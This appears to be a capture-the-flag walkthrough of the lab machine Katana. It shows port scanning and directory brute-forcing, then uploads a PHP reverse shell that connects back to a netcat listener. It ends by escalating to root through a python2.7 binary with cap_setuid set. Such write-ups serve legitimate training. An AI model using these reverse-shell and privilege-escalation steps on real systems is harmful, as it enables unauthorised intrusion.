Exploitation Guide for Katana


This machine is exploited by a file upload vulnerability in a web application. It is escalated by exploiting a misconfigured Linux file capability in the python2.7 binary.



We start off by running an nmap scan:

kali@kali:~$ sudo nmap -p-
Starting Nmap 7.80 ( ) at 2020-08-20 11:33 EDT
Nmap scan report for
Host is up (0.030s latency).
Not shown: 65527 closed ports
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server
7080/tcp open  empowerid
8088/tcp open  radan-http
8715/tcp open  unknown
9198/tcp open  unknown


Using dirb and the default wordlist, we are able to brute-force and discover upload.html on port 8088:

kali@kali:~$ dirb -X .html -r

DIRB v2.22    
By The Dark Raver

START_TIME: Thu Aug 20 14:05:14 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
EXTENSIONS_LIST: (.html) | (.html) [NUM = 1]


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:200|SIZE:195)                                                
+ (CODE:200|SIZE:655)                                                   
+ (CODE:200|SIZE:6480)                                                 
END_TIME: Thu Aug 20 14:07:40 2020


File Upload Vulnerability

Navigating to, we see a couple of file upload controls. We are able to upload the PHP reverse shell available at /usr/share/webshells/php/php-reverse-shell.php:

kali@kali:~$ locate php-reverse-shell.php

Set the local port to 4444 in the PHP reverse shell. We can choose either control for our upload. After selecting the prepared PHP reverse shell, click Submit Query. The following message appears:

Please wait for 1 minute!. Please relax!.

File : file1
Name :
Type :
Path :
Size : 0
Please wait for 1 minute!. Please relax!.

file is empty, not stored.

File : file2
Name : php-reverse-shell.php
Type : application/x-php
Path : /tmp/phpFjoLWh
Size : 5495
Please wait for 1 minute!. Please relax!.

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
MD5 : 8783aa0d056e9e74e9d9856605d072a5
Size : 5495 bytes

The important part is this:

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php

First, start a netcat listener on port 4444. From the nmap scan, we saw an open port 8715. Using some guess work and the above message, we can trigger the reverse shell by navigating to

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 57806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 13:36:02 up 1 min,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'


Checking File Capabilities

Using getcap with the recursive flag from the root directory, we see file capability with +ep permission is set on python2.7:

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep

Linux file capabilities are maintained by the kernel. This concept is similar to how SUID functions. Linux’s thread privilege checking is based on capabilities. Capabilities work by breaking the actions normally reserved for root down into smaller portions. The file capability sets are stored in an extended attribute named security.capability.

We are able to abuse the capabilities misconfiguration of python2.7 to drop ourselves into a root shell:

www-data@katana:~$ whoami
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# whoami


unatended way : bruteforce ssh, and find katana /root

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *